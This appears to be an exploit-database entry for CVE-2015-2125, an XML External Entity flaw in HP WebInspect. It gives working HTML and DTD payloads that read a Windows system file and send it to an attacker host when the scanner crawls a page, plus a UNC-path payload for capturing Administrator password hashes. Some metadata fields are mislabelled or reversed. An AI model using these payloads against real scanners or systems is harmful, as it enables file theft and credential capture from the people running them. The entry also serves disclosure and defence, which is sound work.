HP WebInspect - XML External Entity

vendor:

WebInspect

by:

Jakub Palaczynski

7.5

CVSS

HIGH

XML External Entity

611

CWE

Product Name: WebInspect

Affected Version From: 10.4

Affected Version To: 7.x

Patch Exists: YES

Related CWE: CVE-2015-2125

CPE: a:hewlett_packard:webinspect

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2015

HP WebInspect – XML External Entity

A website was created that exploits the vulnerability by using an OOB technique. The website contains a hidden input field with a payload that contains an XML External Entity. The entity references a file on the attacker's host which specifies which file should be retrieved from the remote host and where the content of that file should be sent. Another website was created that steals hashes of the Administrator user. The attacker needs to start a tool on the server that captures hashes. The exploit is triggered while profiling or scanning the created application using vulnerable versions of HP WebInspect.

Mitigation:

Upgrade to the latest version of HP WebInspect to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125

1. Create website that exploits vulnerability.

1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">

<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">

1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.2.2. Attacker needs to start tool on the server that captures hashes.

2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.